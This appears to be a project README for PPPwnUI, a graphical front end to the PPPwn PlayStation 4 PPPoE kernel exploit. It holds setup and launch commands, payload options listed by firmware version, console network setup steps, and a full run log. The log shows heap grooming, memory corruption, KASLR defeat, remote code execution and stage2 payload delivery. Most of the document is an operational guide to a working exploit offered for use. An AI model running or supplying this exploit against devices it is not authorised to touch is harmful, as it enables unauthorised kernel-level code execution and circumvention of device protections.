PPPwnUI
PPPwnUI Release 4.1
PPPwnUI is a program written in Python that adds a UI to the PPPwn exploit created by TheFlow.
git clone https://github.com/B-Dem/PPPwnUI
pip install -r requirements.txt
Launch the application
Windows:
PPPwnUI.bat
Linux:
chmod +x PPPwnUI.sh
Then:
./PPPwnUI.sh
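Select your interface using the drop-down menu
Choose the exploit version you want to use (PPPwn Python, PPPwn_Go)
Choose your payload:
PPPwn: (available for: 7.00, 7.01, 7.02, 7.50, 7.51, 7.55, 8.00, 8.01, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 9.50, 9.51, 9.60, 10.00, 10.01, 10.50, 10.70, 10.71 and 11.00)
PPPwn Goldhen payload: (available for: 9.00, 9.60, 10.00, 10.01 and 11.00)
VTX HEN: (available for: 7.55, 8.00, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 10.00, 10.01, 10.50, 10.70, 10.71 and 11.00)
PPPwn Linux payload: (available for: 11.00)
Custom payload: (your own custom payload)
Then click "Start PPPwn" to launch the exploit.
On your PS4:
Go to Settings, then go to Network
Select Set Up Internet connection and choose Use a LAN Cable
Choose Custom setup and choose PPPoE for IP Address Settings
Fill in PPPoE User ID and PPPoE Password
Choose Automatic for DNS Settings and MTU Settings
Choose Do Not Use for Proxy Server
Click Test Internet Connection to communicate with your computer
If the exploit fails or the PS4 crashes, you can skip the internet setup and simply click Test Internet Connection. If the script fails or is stuck waiting for a request/response, abort it and run it again on your computer, then click Test Internet Connection on your PS4.
On your computer:
Copy goldhen.bin to the root directory of an exfat/fat32 USB drive and insert it into your PS4.
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow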
[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin
[+] Using PPPwnUI By Memz !
[+] STAGE 0: Initialization
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[ * ] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done
[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[ * ] Sending malicious LCP configure request...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141
[+] STAGE 2: KASLR defeat
[ * ] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000
[+] STAGE 3: Remote code execution
[ * ] Sending LCP terminate request...
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Triggering code execution...
[ * ] Waiting for stage1 to resume...
[ * ] Sending PADT...
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[+] STAGE 4: Arbitrary payload execution
[ * ] Sending stage2 payload...
[+] Done !
This program was originally made with ❤️ by Memz for Sighya.
If you find this program helpful, leave a star on the repository!
If you have any feedback, open an issue!